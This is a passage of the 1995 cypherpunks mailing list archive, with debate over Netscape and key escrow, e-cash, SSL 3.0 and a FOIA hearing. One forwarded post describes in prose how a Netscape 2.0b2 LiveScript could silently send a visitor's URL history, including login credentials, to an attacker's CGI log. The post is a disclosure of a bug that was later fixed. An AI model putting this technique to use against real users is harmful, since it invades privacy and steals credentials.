Lucky Green <shamrock@netcom.com> wrote:
>Hal wrote:
>[parts elided]
>
>>BTW since apparently both deposit and payment messages are not encrypted,
>>coins made out to "@" are in danger of being stolen both while en route
>>from customer to shop and from shop to bank.  This is significant from
>>the point of view of payee anonymous systems, which will need to use such
>>coins.  More encryption will be necessary when such coins are passed
>>around.
>
>Absolutely. Wildcard coins are stealable in transit. However, one might
>safely assume that transactions conducted using such coins be encrypted by
>other methods.
>
But do the current implementations support this?  Can Sam's Shop's ecash
client tell that the payment he just received was made out to "@", and
if so, should encrypt the deposit message to the bank?  What if Sam is not
around to enter his secret key?

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 15:00:36 PST
To: cypherpunks@toad.com
Subject: Privy Affairs
Message-ID: <199512042300.SAA17549@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The WSJ and Financial Times report today on The New
   Transatlantic Agenda, the trade and security pact signed by
   the US and Europe yesterday to "boost cooperation."

      [WSJ] The accord's center piece commits the parties to
      working together on 150 specific policy areas, including
      cutting trade barriers, strengthening cooperation in
      nuclear nonprofliferation and fighting international
      crime.

      "There are mixed urges in Europe right now," says Kirsty
      Hughes, head of the European program at the Royal
      Institute for International Affairs in London. "On one
      hand, the nations of Europe want to keep the U.S.
      involved in European affairs, and on the other, they
      want to develop their own economic, political and
      security arrangements."

   Then, the Fin Times piece, headlined "Clinton and EU
   leaders agree on crime," reports on a variety of issues but
   mentions only in passing the phrase "crime, drugs and
   terrorism."

   This treatment suggests that there is more boosting of
   security and crime-fighting cooperation than the press is
   reporting -- or privy to.

   Recall recent reports on:

      A World Trade Organization cyberspace czar to bring law
      and order to the unruly Net.

      EU plans for setting standards and certifications for
      products, including software for computer security,
      encryption and authentication.

      The future threat to "the West" by a hyper-cyber Asia
      [ex-colonies] deploying information wizardry to level
      the playing field.

   Cooperation on trade and "crime, drugs and terrorism" might
   then be a euphemism for economic aggression -- US-EU
   international affairs arranged to maximize benefits for
   transatlantic self-interests.

   If so, then cryptography is truly a highly valuable
   munitions for economic warfare, worthy of the strongest law
   and enforcement measures, closely fit to the power of the
   weapon. With US-EU GAK and ITAR to protect markets of the
   transatlantic super-nation and selected meta-atlantic
   partners in crime-pure joy.

   Would Michael Froomkin, RIIA Foreign Associate, care to 
   generously unscramble this international affairs sigint?

   Air the pinstriped privy, ahem.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 15:40:43 PST
To: hfinney@shell.portal.com
Subject: Re: towards a theory of reputation
Message-ID: <01HYF42AZPR49S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal"  2-DEC-1995 16:27:08.83

I do think the idea of analyzing costs in terms of "throwing away your
reputation" by cheating and starting anew is an interesting approach.
The question is whether you can really quantify the value of a
reputation.  I know in business now corporations do carry on their books
something called "good will" which I believe is roughly the value of
their good name and trade marks.  However it is not normally considered
to be a major asset, I think.
--------------------
	How much of an asset it is considered to be tends to depend on the size
of the corporation and on the business. For instance, when one doctor buys out
another's practice, "good will" is usually one of the larger categories. In
this case, I believe (it's been a bit since I read about it) that this
essentially is the value of recommendations and of the name of the office.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 16:04:42 PST
To: ecarp@netcom.com
Subject: Re: SEN_sor
Message-ID: <01HYF48O4X749S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ecarp@netcom.com"  4-DEC-1995 15:36:34.26

Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
supply, another $50 or so.  $250 profit.
----------------------
	You appear to be forgetting the interface to the TV set; it will cost
more than for a monitor, unless I've missed something in my last few PC
purchases.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Mon, 4 Dec 95 16:05:32 PST
To: sameer@c2.org
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <01HYF4D3MY5S9S3PZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sameer@c2.org"  "sameer"  4-DEC-1995 15:47:39.33

	It doesn't appear that these people seem to care about
cash-like anonymous token-based payment schemes. Is that a valid
assesment? What is needed to make these people start caring about
that?
-----------------
	I doubt that anyone from a CC company is going to have much enthusiasm
for anonymous payment methods. One way in which they (and the credit bureaus,
of course) make money is via the information they can gain from credit card
usage.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 95 16:22:24 PST
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512042259.RAA08133@universe.digex.net>
Message-ID: <Pine.SUN.3.91.951204191340.23041A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Scott Brickner wrote:

> Black Unicorn writes:
> >I am most distressed because of what I see as a snowjob.
> >
> >"We are anti-GAK"
> >
> >Great, tell me what you have done to prevent GAK from proliferating.
> 
> This is a poor argument.

It would be if there were not some context here.  For example:

> 
> I'd consider myself "anti-war", though I've done nothing more than
> argue against it and behave peacefully myself.  I've even heard
> "pro-war" arguments and considered some of them valid, though not
> enough to change my opinion.

Yet I've not heard anyone else arguing, e.g., that you have done more to 
promote anti-war ideals than anyone else. (A case that was made for 
Netscape and crypto)  I have also not heard you assert that you are 
actively lobbying against war.  (As employees and others have argued 
Netscape is doing)  I have also not heard you flip flop on your 
position.  (Which in my view, and other's, Netscape has).  Were you in a 
position where you had a great deal of infulence over war policy, I think 
you would agree that others asking 'what exactly have you done to 
eliminate war' is not quite as alien to the context of your example.

In short, your example is argumentation by reduction.

> Netscape has pretty clearly said that they don't like the idea of GAK,

Their employees have also asserted that they are working actively to 
discourage GAK, that they are lobbying to get it (insert ambigious words 
here) and on every attempt to get some clairification I have seen 
hedging, assertions that quickly dissolved under the mildist prodding, 
and snowjobbing.

> and that in fora where such things are discussed, they'll argue against
> it.  They've also said that they won't let mandatory GAK put them out
> of business.  That *doesn't* make them pro-GAK.

It certainly doesn't make them active "anti-GAK" either.  Netscape needs 
to realize that the sword they carry is sharp.  If they choose not to use 
it, I want to know why.  Actually, even if I don't know why, I don't 
care, so long as they don't lie or decieve, throwing up thin veils to 
conceal their lack of organization, appreciation of their position, or 
simple laziness and lack of concern.

> Jim Clark hasn't made any statements to the effect that *Netscape*
> supports GAK (quite the contrary), but he *has* noted the government
> position --- "GAK is necessary for law enforcement".
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Mon, 4 Dec 95 18:26:03 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050326.VAA30525@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 4 Dec 1995 01:42:25 -0800
> To:            cypherpunks@toad.com
> From:          anonymous-remailer@shell.portal.com
> Subject:       Re: Do the Right Thing

> On Sun, 3 Dec 1995, Timothy C. May wrote:
> 
> 
> > Netscape, being the dominant browser company, and Microsoft, being the
> > dominant OS company, are in special positions to "build in Big Brother."
> > I'm not claiming they are, just that they are clearly in a position to make
> > it technologically more feasible to make non-GAK illegal. They both need to
> > carefully think about the role that's been "given" to them (whether by
> > fortune, hard work, or being in the right place at the right time) and do
> > what's right.
> 
> That's always a tough position to be in.  If Netscape or Microsoft
> knew what was the "right" thing to do, I don't doubt that they'd be
> doing it.

That's one of the most politically and socially naive statements I've 
ever heard.  Corporations *never* do the "right thing" unless it will 
increase their profits.  Remember, corporations are in business to 
make money by providing a product or service that people will pay 
money for.  Whatever gets in the way of that will fall by the 
wayside.  That's an economic fact of life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Dec 95 18:06:00 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <75960.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  rah@shipwright.com (Robert Hettinga)  writes:
>>        It doesn't appear that these people seem to care about
>>  cash-like anonymous token-based payment schemes. Is that a valid
>>  assesment? What is needed to make these people start caring about
>>  that?
> My guess is, they won't. Ever.
>
> <Elmer Gantry [snip]>

Reality check.

Accountants _know_ how to do books that deal with cash.
Most small business keep their books on a cash basis.
Cash was how the world worked until recently.

Accountants know how to meet acceptable auditing standards when
transactions are in cash. I learned this from the CPA I live
with.

Seems to me this list doesn't have enough folks with a grounding in
non-technical issues. Until the last 30+ years, the world lived
on cash. I like cash. I assume I'll like electronic cash once
people remember what cash is and model it correctly.

Got to to get my beauty sleep before tomorrow's GAK export meeting...
Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 4 Dec 95 13:13:22 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: SEN_sor
In-Reply-To: <199512041905.NAA02443@khijol>
Message-ID: <Pine.BSD.3.91.951204210937.26870F-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Ed Carp wrote:

> 
> Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
> Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
> supply, another $50 or so.  $250 profit.
> 
> What's so tough about that?  Not a bad deal for Acorn, if you ask me. 
>  Hell, maybe I'll go into business making the damned things for that 
> kind of profit margin...
> 

	actually, you need to produce it in volume for $50 to $62.50 in 
order to afford the overhead, sales effort, service effort, advertising, 
and that good stuff.

	other than the floppy drive, I can make it for less than $50 in 
exportd cost from HingKong with a 486-33 knockoff.  Of course, you will 
charge the cusotmer extra for the 256M extra memory....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 4 Dec 95 21:29:32 PST
To: ssl-talk@netscape.com
Subject: New version of SSL 3.0
Message-ID: <30C3D8F8.2781@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


SSL 3.0 protocol has been substantially changed from earlier drafts to
fix a number of performance and cyrptographic issues. The latest version
can be found as PostScript in a compressed tar file on

	ftp://ftp<N>.netscape.com/pub/review/ssl-spec.tar.Z

where <N> is a digit in the range [2-8]. An HTML version should be
available in a day or two. I will post the URL when that happens.

Netscape is also in the process of submitting this draft to IETF.

Questions and comments about this specification should all be directed
to ssl-talk@netscape.com. Answers and replies will be posted there. We
are quite interested in your feedback.

As new eyes see the spec for the first time, I suspect that we will be
notified about typos and areas that are not as clear as they should be.
As a result, there will probably be an update in 2 weeks or so.

PK
-- 
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 21:39:02 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <9512040703.AA14762@pulm1.accessone.com>
Message-ID: <30C3DA0C.5969@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sun, 3 Dec 1995 blancw@accessone.com wrote:
> 
> >
> > Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why
> > don't you write to Jim Clark yourself and tell him about his spinelessness and
> > all your other opinions of him, his unaccceptable attitude, and his worthless
> > company, instead of getting granular with Jim and Dan here on the list?
> >
> > After all, Jim Clark is the one who made the unpleasant statements.
> >
> >   ..
> > Blanc
> >
> 
> I would hope that other's might recognize the trend in Netscape and work
> to act as I have.
> 
> I have written Mr. Clark.

  I have also forwarded some of the messages from this list to him.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 21:40:56 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512040700.XAA14483@blob.best.net>
Message-ID: <30C3DA80.79F1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote:
> >I see, you cannot say that they are really supporting GAK based upon
> >the actual statements made, so you simply assert it.
> 
> You cannot say they oppose it either.  Jim Clark speaks about
> GAK using mostly pleasant sounding favorable words.
> 
> Let me hear him talk about GAK using plain words.
> 
> >Now given point B, I see no reason to expect that they would in the
> >past have done much more than they have.  Given point C, I see they
> >are currently expanding their lobbying.
> 
> I do not see that they are currently expanding their lobbying:  Indeed
> I do not see that they are currently lobbying.
> 
> >I sent a message to Netscape after reading the article that started
> >this,  It simply stated that I wanted clarification on their position
> >on GAK and that if they were to support it they would lose a loyal
> >customer.  I have since been convinced by Jeff Weinstein's posts to
> >this list that the company does not support GAK, and in fact they
> >oppose it.
> 
> I have been convinced that Jeff Weinstein opposes GAK
> 
> If his policy represents company policy then I hope to hear
> a similar statement signed authoritatively.
> 
> I have not seen that yet.

  It is coming.  It may take a few days because many of the
people involved are travelling over the next few days.  I will
send something to the list as soon as possible.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 22:30:37 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050629.WAA28721@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Ed Carp wrote:

> > > Netscape, being the dominant browser company, and Microsoft,
> > > being the dominant OS company, are in special positions to
> > > "build in Big Brother."  I'm not claiming they are, just that
> > > they are clearly in a position to make it technologically more
> > > feasible to make non-GAK illegal. They both need to carefully
> > > think about the role that's been "given" to them (whether by
> > > fortune, hard work, or being in the right place at the right
> > > time) and do what's right.
> > 
> > That's always a tough position to be in.  If Netscape or Microsoft
> > knew what was the "right" thing to do, I don't doubt that they'd be
> > doing it.
> 
> That's one of the most politically and socially naive statements I've 
> ever heard.  Corporations *never* do the "right thing" unless it will 
> increase their profits.  

Sure, I realize this.  I'm very aware of it in fact.  

The art of persuasion is the science of selfish self-interest.  Once a
company realizes that their "profits" are in jeopardy, or that
individual corporate officers are liable to face prison time, then
they generally do the "right" thing, what's in their interest.

It's just like asking questions.  You never ask a question to which
you don't already have the answer.

> Remember, corporations are in business to 
> make money by providing a product or service that people will pay 
> money for.  Whatever gets in the way of that will fall by the 
> wayside.  That's an economic fact of life.

Sure.  This is true.  Facts of Life.  

Stiff upper-lip and such.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 4 Dec 95 22:35:36 PST
To: cypherpunks@toad.com
Subject: Re: GAK_hit
In-Reply-To: <199512041603.IAA22793@blob.best.net>
Message-ID: <30C3E74F.4BB0@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 09:25 AM 12/4/95 -0500, John Young wrote:
> >   12-4-95. W$Jabber:
> >
> >   "Microsoft Probe Spurs Subpoenas Tied to Internet.
> >   Antitrust Effort Appears Focused on Windows 95 Disabled
> >   Rival Software."
> 
> >      The subpoena issued to Netscape may be of particular
> >      significance. In the estimate of Netscape and industry
> >      observers,
> 
> I regularly use netscape on windows 95, and I conclude that
> this subpoena is pure, 100% harassment.

  I've heard that when a machine that already has Internet In A
Box, Netscape Navigator personal edition, or some other internet
software with a stack and dialer is upgraded to Win95, the win95
installation may somehow disrupt the functioning of the winsock
or dialer.  I've also heard that re-installing the application
will solve the problem.  I've never seen the problem myself,
and don't know anything about any subpoena...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Mon, 4 Dec 95 20:07:35 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512050406.XAA03449@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512050326.VAA30525@khijol>, Ed Carp <ecarp@netcom.com> wrote:
>That's one of the most politically and socially naive statements I've 
>ever heard.  Corporations *never* do the "right thing" unless it will 
>increase their profits.

I just *love* hearing statments like this from people who have probably
never started their own businesses.

Corporations are no more or less than their component people.  If the people
running a corporation care about an issue, the corporation will act upon
it  -- bounded by the interaction of their survival instinct with their
assessment of reality.  How could it be otherwise? 

The literature out there abounds with counterexamples to the "corporations
are automata" idea (for some reason, they love to harp on Ben & Jerry's).
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMPFSSoZzwIn1bdtAQG1FAGAsXRzDAFRmZWvyKt8AlkGvHfWgCth9izE
Ibj/E41hbgSTvppJot/OWcFpa00B46PD
=d6+o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 5 Dec 95 23:21:36 PST
To: Scott Brickner <unicorn@schloss.li>
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512060722.XAA25437@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:59 PM 12/4/95 -0600, Scott Brickner wrote:
>Netscape has pretty clearly said that they don't like the idea of GAK,

Actually netscape has not said that:

Jeff has said that netscape *will* say that real soon now.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Johnson <bobj1968@ns.cencom.net>
Date: Mon, 4 Dec 95 22:09:14 PST
To: cypherpunks@toad.com
Subject: Crypto stuff
Message-ID: <30C3FCA9.9CB@cencom.net>
MIME-Version: 1.0
Content-Type: text/plain


Could you send me some info on crypto stuff. I need to secure some files 
and as yet havent figured out how to do it. If you can help I would 
appreciate it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 00:16:13 PST
To: cypherpunks@toad.com
Subject: Re: Tricky Netscape Security Hole
In-Reply-To: <199512050729.AAA28538@mailhost1.primenet.com>
Message-ID: <30C3FEE5.71C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thaddeus Ozone, by way of carolann@censored.org Censored Girls Anonymous wrote:
> 
> Yes it's full of headers, but it's the complete, unexpurgated version.
> If this theory is correct, this IS FAR WORSE THAN A 40 bit key.
> 
> I saw the livescript on the source code.
> I use 1.22 for image stability right now, though.
> 
> Yes it's a came from, a came from, a came from kinda deal,
> but in the interest of security brevity it "seems real enough" to me.

  Didn't you see this discussed here last week?  This is a bug in Beta 2.
It has since been fixed, and the now available Beta 3 of Netscape 2.0
has the fix.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drozone@winternet.com (Thaddeus Ozone) (by way of carolann@censored.org (Censored Girls Anonymous))
Date: Mon, 4 Dec 95 23:27:59 PST
To: cypherpunks@toad.com
Subject: Tricky Netscape Security Hole
Message-ID: <199512050729.AAA28538@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes it's full of headers, but it's the complete, unexpurgated version.
If this theory is correct, this IS FAR WORSE THAN A 40 bit key.

I saw the livescript on the source code.
I use 1.22 for image stability right now, though.

Yes it's a came from, a came from, a came from kinda deal,
but in the interest of security brevity it "seems real enough" to me.

Love Always,

Carol Anne

>Posted-Date: Mon, 4 Dec 1995 12:57:21 -0600
>X-Sender: jeff@cyborganic.com
>Mime-Version: 1.0
>Date: Mon, 4 Dec 1995 10:51:56 -0700
>To: cybernauts-l@netcom.com
>From: foodie@netcom.com (We're a Comglomerate) (by way of jeff@cyborganic.com
> (Jeffrey Logsdon))
>Subject: Tricky Netscape Security Hole
>
>Anybody else see this happening?
>
>Eternal Vigilance, and all that.
>
>- ------- Start of forwarded message -------
>>From: Scott Weston <scott@tripleg.com.au>
>>Subject: Netscape 2.0b2 allows for invasion of privacy
>>Newsgroups: aus.net.announce,comp.privacy
>>Date: Fri, 01 Dec 1995 11:09:06 +1100
>
>Hi 'Net Dwellers,
>
>First off - I've posted this before (however not to this group) and only
>got a response from the Netscape Corp.  They were glad I found the
>problem and said that they would fix it, however I feel that people
>should know about it.  Also I would like people to help me spread this
>document around, i.e. if you know of a newsgroup (or people) that would
>find this interesting then please re-postit.
>
>On with the problem...
>
>I've recently got hold of the latest netscape, and was (at first) very
>excited about the new "LiveScripts" that it supports.  If people don't
>yet know - these "LiveScripts" allow you to put small programs into your
>web page that is then executed by the Netscape client.  There is no
>DIRECT way for these programs to send information back to the owner of
>the web page, however I was able to do it in a not-so-direct way.
>
>The "LiveScript" that I wrote extracts ALL the history of the current
>netscape window.  By history I mean ALL the pages that you have visited
>to get to my page, it then generates a string of these and forces the
>Netscape client to load a URL that is a CGI script with the QUERY_STRING
>set to the users History.  The CGI script then adds this information
>to a log file.  Now if this hasn't quite CLICKED yet lets do a little
>example.
>
>Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
>to start his daily "surf" session.  First he decides to check his CD-NOW
>purchase and uses the handy Auto-Login URL.  Then he decides to go to
>Lycos and do a search.  In his search he find my page, which he decides
>to visit.  Suddenly he is transported, not to my main page but to one
>of my CGI scripts, which in turn happens to have ALL the URL's he just
>been to in it.  This means that in my log will be:
>
>  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
>    username and password.
>  - The exact search params he used on Lycos (i.e. exactly what he
>    searched for)
>  - plus any other places he happened to visit.
>
>I do this in a way that the user will KNOW that it has happened and
>will _hopefully_ email Netscape and tell them they are NOT impressed.
>But it would be EASY for me to change the CGI script so that the user
>is unaware that it has actually happened, unless they closely examine
>their URL history (in fact they'll probably just think its a netscape
>bug).
>
>
>If you're skeptical about this then do the test yourself.  Get netscape
>2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:
>
>  scotts car boot sale
>
>which should return the URL - http://www.tripleg.com.au/staff/scott
>
>Click on the URL and sit back an watch.  First my main page will show up
>but a little while later you should be transported to a CGI bin script
>that will show you your URL history.
>
>I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
>and both have done the same thing.  I would be interested in knowing if
>it happens for ALL versions of Netscape2.0b2.  The log file does log
>the User Agent (i.e. the name of the platform you are using) so by simply
>going to the page I will know that your version of Netscape is also
>open to this form of attack.
>
>Currently I can find no way to configure Netscape2.0b2 to NOT run
>LiveScripts - and at the very least this option should be quickly
>added to the next version of netscape to be released.  But a far
>better solution (IMHO) would be for netscape to pop up a window before
>running the LiveScript and let you know what the LiveScript wants access
>to, e.g. if it only wants to print out the current time then that's
>OK, but if it wants to read my history list and then transport me to
>a CGI script and add me to a logfile then maybe I would say NO.
>
>I think I've said enough....
>
>If you've got any further questions, or want some more information just
>email me : scott@tripleg.com.au
>
>- --
>Scott.
>
>Quote from a car accident insurance claim: "I told the police that I was
>not injured, but on removing my hat, I found that I had a skull fracture."
>- ------- End of forwarded message -------
>
>
>------------------------------

------------------------------------------------------------
Thaddeus "Doc" Ozone    <http://www.winternet.com/~drozone/>
          "Specialization is for insects."   -RAH
  "I yam what I yam and that's all what I yam!"   -Popeye







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 5 Dec 95 00:05:02 PST
To: cypherpunks@toad.com
Subject: No Privacy Right on "My" Desktop ?
Message-ID: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
A 12 04 95 The Electronic Telegraph newsstory headlined 
 
            'Spoilsport' software bars games 
 
reports that 
 
   An American company called DVD has developed a utility 
   called UnGame that can delete up to 3,100 games from a 
   computer network.  Even if the game is hidden on the com- 
   puter user's own hard disk, it will find it. 
 
 
The user's own hard disk? 
 
   Although the machines at work usually belong to the com- 
   pany, most employees regard them as an electronic equi- 
   valent of their desk, and are similarly territorial. 
 
 
John Davison, PC Zone editor, says: 
 
   If anyone stole something from your desk you'd be fed up. 
   If anybody stole something from my computer, I'd be equal- 
   ly disgusted. 
 
 
What kind of software is UnGame? 
 
The newsstory suggests the answer: 
 
   ...industry experts have complained that companies may 
   be releasing "tailored viruses".... 
 
 
I believe my first post to the list was about McAfee's Virus 
Blocker.  Perhaps that can be...adapted. 
 
If so, those who then declared the information had nothing 
to do with privacy may continue playing their games. 
 
Of course companies may try another tack: Oracle's "internet 
terminal." 
 
As dlv@bwalk.dm.com pointed out in his 11 18 95 post, 
 
 [I guess, they mean no permanent storage or software other 
 than the browser in ROM. No remembered state, no viruses 
 ... -DV] 
 
 
In "my" terminal. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph's website URL is: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's online filename is: 
 
       ngame02.htm 

       It was written by: 
 
       ROBERT UHLIG, TECHNOLOGY CORRESPON- 
       DENT 
 
       It first appeared in 12 03 95 The Daily Telegraph. 
 
       The McAfee website URL is: 
 
       http;//www.mcafee.com 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 5 Dec 95 03:44:38 PST
To: cypherpunks, tien@toad.com, gnu
Subject: SF NSA FOIA appeal hearing canceled on the 6th.  Go to San Jose!
In-Reply-To: <9511231746.AA16675@toad.com>
Message-ID: <9512051144.AA27252@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 9AM on December 6 in San Francisco, the 9th District Court of Appeals
> will finally hear the appeal of my original FOIA case against NSA.

Wrong!  The three Court of Appeals judges who were selected to review
my case have decided that there is no need for "oral argument" (a
hearing).  They will simply decide based on the written briefs that
they got a year ago when we did the appeal.  This probably means we'll
get a decision sooner rather than later, but we don't know how it will
come out.

Sorry for the false alarm.  I just found out last week.

So, you can feel free to go to Roger Schlafly's crypto patent validity
case in San Jose instead.  I'll repeat the info he provided, below.

	John Gilmore

> On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will
> be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle,
> RSA, and Schnorr patents.
> 
> There are also some annoying procedural technicalities that are
> also scheduled to be heard, so we may not get to the patents
> right away.  (antitrust standing, sufficiency of pleadings,
> admissibility of evidence, etc.)
> 
> Details:
> Schlafly v. Public Key Partners & RSA Data Security
> Case C-94-20512 SW PVT
> Hon. Spencer Williams
> At the San Jose federal building, 280 S First St.
> Ask the US Marshals where Williams' courtroom is while you go thru
> the airport-style security.
> Court Clerk: 408/535-5364
> 
> The Federal Bldg is in downtown San Jose, between 101, 880, and 280.
> I will take 280 to SJ, go north on 87, right on the first exit, and
> park in the first convenient lot or garage.  There is some street
> parking, but the SJ meter maids are very efficient.  If you come
> from the north, you may want to take 87 or the Almaden Expwy.  (I get
> those mixed up.)
> 
> The judge is used to lawyers wearing suits, so try to wear something
> that won't appear disrespectful.
> 
> Roger Schlafly
> 
> phone: 408-476-3550
> CompuServe: 76646,323
> US Mail: PO Box 1680, Soquel, CA 95073 USA
> Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Dec 95 03:40:26 PST
To: cypherpunks@toad.com
Subject: The "Future" Fallacy
Message-ID: <2.2b8.32.19951205114442.0085d9d4@panix.com>
MIME-Version: 1.0
